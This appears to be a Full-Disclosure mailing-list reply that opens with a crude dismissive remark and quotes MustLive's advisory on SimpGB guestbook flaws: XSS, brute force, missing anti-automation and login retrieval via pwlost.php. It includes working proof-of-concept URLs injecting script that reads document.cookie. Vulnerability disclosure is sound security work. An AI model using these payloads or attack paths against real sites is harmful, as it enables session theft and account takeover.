Send your shitty stuff to bugt...@securityfocus.com If it's not obvious, no one give a shit here, seriously.
2011/1/27 MustLive <mustl...@websecurity.com.ua> > Hello list! > > I want to warn you about Cross-Site Scripting, Brute Force, Insufficient > Anti-automation and Abuse of Functionality vulnerabilities in SimpGB. > > ------------------------- > Affected products: > ------------------------- > > Vulnerable are SimpGB v1.49.02 and previous versions. > > ---------- > Details: > ---------- > > XSS (WASC-08): > > POST request at page http://site/guestbook.php in parameters poster, > postingid and location in Preview function. If captcha is using in > guestbook, then working code of the captcha is required for the attack. Or > via GET request: > > > http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview<http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&input_text=111111111111111111111111111111&preview=preview> > > > http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview<http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview> > > > http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview<http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&input_text=111111111111111111111111111111&preview=preview> > > Brute Force (WASC-11): > > http://site/admin/index.php > > Insufficient Anti-automation (WASC-21): > > http://site/admin/pwlost.php > > In this functionality there is no protection from automated requests > (captcha). > > Abuse of Functionality (WASC-42): > > http://site/admin/pwlost.php > > In this functionality it's possible to retrieve logins. > > ------------ > Timeline: > ------------ > > 2010.11.17 - announced at my site. > 2010.11.19 - informed developers. > 2011.01.25 - disclosed at my site. > > I mentioned about these vulnerabilities at my site > (http://websecurity.com.ua/4690/). > > Best wishes & regards, > MustLive > Administrator of Websecurity web site > http://websecurity.com.ua > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/